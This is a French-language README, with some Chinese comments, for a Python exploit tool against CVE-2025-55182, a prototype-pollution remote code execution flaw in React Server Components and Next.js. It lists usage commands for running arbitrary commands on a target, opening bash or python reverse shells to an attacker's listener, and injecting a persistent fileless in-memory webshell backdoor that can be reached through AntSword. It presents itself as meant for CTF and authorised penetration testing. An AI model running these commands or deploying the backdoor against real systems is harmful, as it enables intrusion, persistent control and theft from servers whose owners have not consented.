
Outil d'exploitation automatisé pour CVE-2025-55182 (RCE React/Next.js) avec exécution de commandes, détection sortante, shell inverse interactif et injection de webshell mémoire persistante pour les tests d'intrusion autorisés et les défis CTF.
Auteur : lamaper / BITs2Sys
Version : 1.0.1
Licence : MIT
Cet outil est un outil de test d'intrusion automatisé spécialement conçu pour CVE-2025-55182 (RCE provoquée par une pollution du prototype dans React Server Components / Next.js). Il est destiné aux compétitions CTF et aux projets de sécurité autorisés, et intègre plusieurs fonctionnalités : validation de la vulnérabilité, détection des accès sortants, reverse shell et injection de cheval de Troie en mémoire.
--cmd) : utilise le mécanisme d'exception NEXT_REDIRECT pour renvoyer avec précision les résultats d'exécution de commandes encodés en Base64.--check-outbound) : teste automatiquement la capacité de la cible à accéder à DNS, HTTP et ICMP, afin d'aider à décider de la voie d'attaque.--shell)--inject-ms) : injecte un cheval de Troie en mémoire en détournant le mécanisme de distribution d'événements du serveur http.Server de Node.js, sans laisser de fichier résiduel, et permet un contrôle persistant.--ms-cmd) : mode interactif indépendant du chemin de déclenchement de la vulnérabilité ; une fois l'injection réussie, les commandes peuvent être exécutées directement via la backdoor.Cet outil est développé en Python 3 et nécessite uniquement l'installation de la bibliothèque requests.
pip install requests
https://github.com/assetnote/react2shell-scanner est un outil de détection très pratique.
Récupérer directement des informations sur la cible :
python exploit.py --url http://target.com/ --cmd "id"
python exploit.py --url http://target.com/ --cmd "cat /flag"
Avant de tenter un reverse shell, confirmez que la cible peut accéder à Internet :
python exploit.py --url http://target.com/ --check-outbound
Mode Bash :
# 攻击机执行监听: nc -lvnp 4444
python exploit.py --url http://target.com/ --shell bash --ip <你的IP> --port 4444
Mode Python :
python exploit.py --url http://target.com/ --shell python --ip <你的IP> --port 4444
Injecter le cheval de Troie en mémoire :
python exploit.py --url http://target.com/ --inject-ms
Exécuter des commandes via le cheval de Troie en mémoire (après injection réussie) :
python exploit.py --url http://target.com/ --ms-cmd "whoami"
Note : le cheval de Troie en mémoire est monté par défaut sur /?pass, déclenché en envoyant le paramètre pwd via POST.
Connexion via AntSword (蚁剑) :
Mot de passe de connexion : pwd, type de connexion : CMDLINUX
Cet outil est destiné uniquement à la recherche en sécurité dans les limites prévues par la loi, aux compétitions CTF et aux tests d'intrusion autorisés. Toute utilisation pour des attaques illégales est strictement interdite. L'utilisateur est seul responsable de toutes les conséquences découlant de l'utilisation de cet outil.